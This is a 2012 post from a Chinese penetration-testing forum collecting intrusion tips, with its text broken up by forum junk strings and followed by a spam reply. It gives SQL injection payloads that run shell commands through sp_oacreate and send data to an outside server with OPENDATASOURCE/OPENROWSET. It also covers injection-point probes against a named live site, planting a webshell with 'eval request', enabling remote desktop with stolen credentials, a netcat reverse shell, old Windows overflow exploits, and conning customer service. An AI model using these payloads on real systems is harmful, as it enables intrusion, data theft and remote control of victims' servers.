中国网络渗透测试联盟

标题: 站库分离的方法 [打印本页]
作者: admin    时间: 2012-9-15 14:41
标题: 站库分离的方法
SA点数据库分离技术相关
; t# }, d% t# H( X# h& n( g. W& v. v; I% l, W& n6 D

# C% o  n* Q+ q7 h/ eSA点数据库分离搞法+语句:
% X+ L9 c: B: n9 a$ ^. P
. f- n. D' \4 e8 g; Q注射点不显错,执行下面三条语句页面都返回正常。
; c  ^, T* T, E4 @and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
) H5 h: m# \) J& O; Jand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')( ^, v3 q# i+ |0 Y* E! ]. N5 h, Y
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
9 f2 k$ _- v9 f可以列目录,判断系统为2000,web与数据库分离8 Q7 n4 _* B- O; v9 Z  }5 _
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。1 v8 g% k4 o* W& H# n  g! ?
在注射点上执行
* t" a5 h% h* c+ y5 cdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--  A0 W  u( R& G# Y) x
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP% u' g. I! `+ H) A% h
还有我用NC监听得其他端口都没有得到IP。) w5 u9 A7 }. D) j

9 K# z  D1 |. ^6 y) F. p9 u- g通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。; I$ c4 ]( ^- w. ~, s
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
) O9 [( c3 K& k3 }6 Q- S+ Q- i- \
% Y3 `+ M5 C9 P% R% J% m% N;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
: j: |7 `: ^, g5 h4 _; m6 n. h; f# p6 W2 G' P6 b/ U
现在就猜想是不是数据库是内网而且不能连外网。
9 G: ~- [; `& I, v6 D
8 @% {! a) {2 ^3 t: L5 d
1 S, |5 ]9 C  @* |# ?access导出txt文本代码. F, p" p% Y& r8 _6 Z( n, `
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
0 d, x; a# `1 D# Z" U- H2 ]; o
( D) J& L7 P. b7 o# B  ?# `) S  P2 \2 J- r8 ?* @% g) }
7 _. j$ B/ c) Z* H( ~7 C5 I: b+ H
自动跳转到指定网站代码头) k# g1 g1 e/ J1 f) s
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
$ I6 u- H# I  x# J/ \' O+ S2 n6 s  l- F

/ d  O! k8 T$ N8 R/ B入侵java or jsp站点时默认配置文件路径:
% W  F) d$ F+ z1 C6 n% f! [9 U\web-inf\web.xml3 w3 x; `/ x/ }
tomcat下的配置文件位置:; a) z+ k2 r' |" x8 r
\conf\server.xml            (前面加上tomcat路径)
/ t7 p8 h3 c- s$ O  e% `% z- S3 e\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
; ~  r. X0 r5 a: B6 Y' X' X8 J- ?: y0 ~  C* e. L
6 t( E4 ^. [/ W) o

. X0 N' J4 S3 h5 `0 R检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
9 b' p! B4 |2 W/ k-1%23( q% a& s! W  `3 A8 T
> & Z, o# }* C+ `) c% Q3 {4 }
<; {# g$ C  H- @
1'+or+'1'='14 W2 J5 E0 b6 A& V  J4 Z6 ~& l
id=8%bf
1 g9 Z. b& r- O, _; N1 c* r; ~) ~0 _8 h5 P! I
全新注入点检测试法:
" @3 `: t6 e% O& \0 d0 W在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
5 ?$ v+ k  [! |  l  b7 b
2 [& ~0 q) R$ F4 s4 H) a8 h在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。3 |9 }! h4 j# F! t

& T& x6 k+ g# T3 f8 L搜索型注入判断方法:9 y: H6 ^; ^  H9 j% c& y2 f
北京%' and '1'='1' and '%'='
6 t8 T, v- q. W8 @- P0 \; m北京%' and '1'='2' and '%'='4 N! B  S0 ~4 A* h$ |' M: I2 t7 q

$ }0 w/ l. x( D7 [6 o, X" r# i* z' E/ n2 L# W
COOKIES注入:+ a" T, Q" _! p4 X  M

6 C+ q9 p5 U0 [) h( U  \* @3 S$ ejavascript:alert(document.cookie="id="+escape("51 and 1=1"));
" Q1 A8 E0 l2 a+ G( ^0 A7 S
9 T, Z* K7 b- S( G, Q2000专业版查看本地登录用户命令:
% }% `0 A4 `' W2 p9 Dnet config workstation
1 ]5 `$ F' c2 c$ H- B- \6 R# W2 L
" [2 g! u7 r" i
, w. P' N3 D/ e( v3 z" y2003下查看ipsec配置和默认防火墙配置命令:7 C" e1 o" N, N& S
netsh firewall show config  N0 d0 a& M/ ]+ x% ?# c0 Q
netsh ipsec static show all+ m3 V+ D# g6 C
6 q0 J% w4 M* Y7 \0 j
不指派指定策略命令:# h5 d1 {- Q+ n' \
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)- v3 M6 Y& L4 e! B
netsh ipsec static show policy all  显示策略名: }* e1 [: l1 r+ k! K( q: S5 {
. @2 g7 Y+ x9 z2 ]

8 W. N% M. g  k* C" |猜管理员后台小技巧:
, F5 A! e: q2 o' e4 K. G5 S. Sadmin/left.asp
( C" B& x# e; ?. n" S1 nadmin/main.asp) S% a4 K3 q! B' W* I
admin/top.asp
7 u! X( K) E! N' [/ Q# `2 Hadmin/admin.asp
+ M, V# m' P3 j, n/ `会现出菜单导航,然后迅雷下载全部链接& y$ l& b7 ^- j3 m( J& m. {2 k
4 n( ^$ Z; N. ?. _; s

6 ~3 I7 ]9 }. K$ e& t社会工程学:
( x6 j5 K( m. a7 z* j! k用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人$ e+ D1 M8 v# n9 {  f0 F$ J
然后去骗客服
: ^, u! T% j/ d; D+ ~& w2 p8 [. q+ N" q/ h- N9 G* r! n
! ^: X( y- N: U+ w7 ?5 s/ `$ {0 R
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
& D8 y: i7 x' i4 Z- J% [查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
6 ~" v9 c# `; Y5 \$ o. c  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。# P9 X$ Z# O9 \3 q; i+ G
0 u+ k& A% M7 o/ a# @( }/ S- s- z
' C& ~$ k( L' {( ]3 b& U
% J) o: R- i: h- T6 I% c7 |
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)( ~) s% c- E; O2 \

/ T7 A0 o) j$ W0 K' D, X" A( U$ j$ e

! i" w1 v7 f+ _) S3 l% uCMD加密注册表位置+ \. ~# M1 W; W, Y- j( b, T
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
( j2 G7 ?6 n; L  ]7 P+ }AutoRun
1 W8 _. a3 |/ x0 `9 F3 w1 G8 C- m8 d; J) U) E
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor2 X, ~" O& C. q6 A
AutoRun) I* m$ L: x, ]3 s

1 T& I- ?5 ]$ f0 a1 e" j: S" B, ~
; e- s( D$ j# u' D7 x# g在找注入时搜索Hidden,把他改成test
3 i( O5 L* M  O1 i+ s$ n9 G
7 I" ^! m3 q4 P0 X0 s
* e" M8 g9 u& _( B. {  d
. [; H: Z/ \! s: Pmstsc /v:IP /console
; k% t0 E5 z) `, T; p6 W, D7 e
( k7 Z9 B5 x( l8 Z+ H. x$ u6 E7 {2 @
一句话开3389:. \; e( Q: ^1 a$ [, R

' L% S% |& B5 w最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  $ l/ O; f( \+ Z) Y6 G! y
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
1 K# L4 C, T" m- o+ P: s' w7 z6 g% Z* U- U; G
. S! X4 Y6 t; x3 t
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:3 G! Q: X1 c% f+ A
Insert into admin(user,pwd) values('test','test')- I& I4 E9 ^6 [" f
2 I% N  \) B) V. p- ~
6 N# H) |& y# A% a- L- x; j0 k
NC反弹
. M2 o9 _3 N4 Y9 ~% c先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   # V; b- G6 p, n4 V) F* ~# i5 x& e
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
( i# N( ]" q, b6 \8 f  Z# S9 |6 F) ^4 r$ V; d( |

2 p. J- @8 T/ @2 Y& J& A; v在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
, X4 f- ?5 q2 R9 E1 n+ e% [
0 W5 ]4 l9 F* A. U6 p5 r有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录0 M( }3 \/ z9 X% g. H
例如:
* Q$ A6 X9 S" p9 Z; ^& @' }, Fsubst k: d:\www\ 用d盘www目录替代k盘
( H" r- I8 f" nsubst k: /d  解除K盘代替
作者: 匿名    时间: 2017-12-20 02:36
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2